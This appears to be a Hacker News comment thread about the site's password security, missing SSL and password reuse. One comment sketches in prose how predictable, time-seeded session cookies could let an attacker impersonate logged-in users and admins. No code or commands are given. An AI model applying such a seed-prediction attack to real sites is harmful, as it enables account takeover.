I think the main concern is not that someone can use your account here at HN but the fact that they can get the password file and use your password to access your personal emails and whatever else (assuming that your using the same password, which some people do)

"assuming that your using the same password, which some people do"

This is the key. You're an idiot if your Hacker News password is the same as that of your email.

Agreed, thats why mines different :)

"The passwords aren't encrypted, he cries about it, they are encrypted, he cries about it."

Hmm. No, I don't. I only 'cry about it' (in your words) if the passwords are not adequately secured.

And the fact there is no SSL?... (Anyone can snoop your HN password in transit anyway)?

I guess you've found the next installment of the series.

No, I already mentioned that some place else. If you want to get interesting take a look at how unique IDs are generated.

They rely on the Scheme random number generator which is seeded using the milliseconds of Unix epoch. Since PG regularly restarts the server it should be possible to get a window of time in which to test a succession of random number seeds. If you could hang around until the server was dead (say test every few seconds), then login and obtain a cookie you'd have enough to do a prediction of the server seed. You could then run the random number generator forward predicting cookie values and then run them by the server to see which ones are valid.

As people log in you'd be able to impersonate them. Assuming that an admin logged in while you were testing you'd be able to impersonate an administrator and have some fun on the site.

Well, I'm sure you could find a gazillon race conditions. And you know what ? Most of the time it doesn't matter.

I'd contribute $5 or $10 a year towards SSL via PayPal. Does anyone else care enough about password hijacking to pay a little? Though that might require a hardware upgrade, as well (if the scope extends beyond login to site browsing).